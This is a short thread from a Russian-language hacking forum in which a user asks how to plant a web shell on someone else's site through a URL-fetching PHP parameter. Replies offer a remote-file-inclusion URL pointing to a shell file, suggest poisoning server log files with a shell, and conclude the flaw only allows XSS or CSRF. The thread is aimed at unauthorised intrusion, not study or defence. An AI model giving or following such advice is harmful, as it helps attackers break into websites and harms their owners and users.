Нужна помощь с заливкой shell'a

Discussion in 'Песочница' started by StormAttack, 23 Jul 2012.

  1. StormAttack

    StormAttack Member

    Joined:
    15 Jun 2011
    Messages:
    178
    Likes Received:
    17
    Reputations:
    -1
    Есть сайт: https://site.com/cstest.php?url=
    Eсли дописать ссылку https://site.com/cstest.php?url=http://site.ru/shell.php - то на сайте выводиться shell с моим сайтом.
    Вопрос: можно ли залить Shell на сайт "https://site.com" ?
     
    #1 StormAttack, 23 Jul 2012
  2. xxddz

    xxddz Elder - Старейшина

    Joined:
    2 Oct 2009
    Messages:
    706
    Likes Received:
    365
    Reputations:
    162
    Попробуй
    https://site.com/cstest.php?url=http://site.ru/shell.txt
     
    #2 xxddz, 23 Jul 2012
  3. StormAttack

    StormAttack Member

    Joined:
    15 Jun 2011
    Messages:
    178
    Likes Received:
    17
    Reputations:
    -1
    не прокатило...

    вот что выбило:

     
    #3 StormAttack, 23 Jul 2012
  4. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Нет, это не поможет, так как судя по словам из первого поста, на сайте скорее всего создается страница, которая содержит iframe со ссылкой на url.
    Хотя не iframe, скорее всего, а сайт просто пытается скачать и вывести страницу, которая передается в параметре url.
     
    #4 Chrome~, 23 Jul 2012
    Last edited: 23 Jul 2012
  5. человек-паук

    человек-паук Banned

    Joined:
    16 Jul 2012
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    если через cstest.php?url= можно читать локальные файлы, пробуй найти лог-файл и отправить на сервер пакет с шеллом
     
    #5 человек-паук, 23 Jul 2012
  6. StormAttack

    StormAttack Member

    Joined:
    15 Jun 2011
    Messages:
    178
    Likes Received:
    17
    Reputations:
    -1
    это не iframe, это форма с полями URL и FORM Body
     
    #6 StormAttack, 23 Jul 2012
  7. StormAttack

    StormAttack Member

    Joined:
    15 Jun 2011
    Messages:
    178
    Likes Received:
    17
    Reputations:
    -1
    локальные файлы не читает

     
    #7 StormAttack, 23 Jul 2012
  8. Chrome~

    Chrome~ Elder - Старейшина

    Joined:
    13 Dec 2008
    Messages:
    936
    Likes Received:
    162
    Reputations:
    27
    Я понимаю, но страница, которая выводится после отправки формы, может содержать iframe, или же как я написал выше - содержимое скачанного файла.
    Тогда все ясно. Скрипт просто обращается к странице url, скачивает ее, и выводит на экран. Это можно использовать максимум для XSS/CSRF атаки, но только при условии, что страница выведется как html документ, а не чистый текст.
     
    #8 Chrome~, 23 Jul 2012
    Last edited: 23 Jul 2012
    1 person likes this.
  9. StormAttack

    StormAttack Member

    Joined:
    15 Jun 2011
    Messages:
    178
    Likes Received:
    17
    Reputations:
    -1
    Понятно, спасибо.
     
    #9 StormAttack, 23 Jul 2012
  10. totenkopf

    totenkopf Elder - Старейшина

    Joined:
    19 Jul 2010
    Messages:
    92
    Likes Received:
    64
    Reputations:
    19
     
    #10 totenkopf, 2 Aug 2012
(You must log in or sign up to post here.)
Loading...
Similar Threads - Нужна помощь заливкой
  1. ilqar200

    нужна помощь в rce в django 2.2.8

    ilqar200, 25 Feb 2023, in forum: Песочница
    Replies:
    0
    Views:
    1,801
    ilqar200
    25 Feb 2023
  2. ilqar200

    нужна помощь в пентестинге внутри хостинга

    ilqar200, 8 Feb 2023, in forum: Песочница
    Replies:
    1
    Views:
    2,367
    fandor9
    7 Mar 2023
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.